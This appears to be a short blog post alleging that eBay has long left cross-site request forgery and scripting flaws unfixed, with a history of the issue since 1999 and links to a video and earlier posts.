The dreaded XSRF cross site request forgery exploit is still uncorrected on ebaY. That means extreme risk to both ebay and Paypal users.




Let’s begin way back in 1999. This phylum of flaws (cross-site/scripting) has existed on ebay since before there were terms coined for it. I produced a quick & dirty video outlining not only that, but how ebay sought to make a public relations play by announcing the removal of sellers’ ability to use active scripting elements in the user generated content of ebay listings, then quietly reversed the decision, and buried that news on a backwater blog. You can cut to the quick  by clicking the more info area of the video and following the links.


Moving forward.


We blogged this vulnerability back in September. Yet if you follow the links there, you see the flaw actually existed for 3 years.



Now to the present day…


Very interesting read. Points to ebay lack of due diligence to protect users & visitors to the site, and Phishing/organized crime links. Follow links, read comments, leads to live xss listing on video, and the possibility that a DDoS attack could be launched “on* *eBay’s* *own* *servers”, using malicious coding which ebay allows in all listings

read more